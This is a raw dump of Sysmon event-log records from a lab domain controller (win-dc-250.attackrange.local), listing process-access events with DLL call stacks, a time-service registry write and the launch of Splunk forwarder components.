13:10:29.507{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003023Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:29.507{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003022Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:29.507{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003021Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:29.507{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003020Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:29.507{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-42C5-6000-8F00-000000009A01}4352C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003019Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:29.507{08A6967A-4288-6000-1000-000000009A01}11362272C:\Windows\system32\svchost.exe{08A6967A-42C5-6000-8F00-000000009A01}4352C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e014|c:\windows\system32\UBPM.dll+115a2|c:\windows\system32\EventAggregation.dll+3fae|c:\windows\system32\EventAggregation.dll+3ea1|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003018Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:29.507{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003017Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:29.507{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000003058Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:10:32.476{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ea76-0xa389caf3) 10341000x80000000000000003071Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:52.457{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-42DC-6000-9300-000000009A01}4500C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003070Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:52.457{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003069Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:52.457{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003068Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:52.457{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003067Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:52.457{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003066Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:52.457{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003065Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:52.457{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003064Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:52.457{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003063Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:52.457{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003062Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:52.457{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003061Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:52.457{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-42DC-6000-9300-000000009A01}4500C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003060Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:52.457{08A6967A-4298-6000-3400-000000009A01}23163912C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-42DC-6000-9300-000000009A01}4500C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003059Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:52.457{08A6967A-42DC-6000-9300-000000009A01}4500C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003085Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:53.429{08A6967A-42DD-6000-9400-000000009A01}47084716C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003084Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:53.288{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-42DD-6000-9400-000000009A01}4708C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003083Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:53.288{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003082Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:53.288{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003081Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:10:53.288{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003080Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 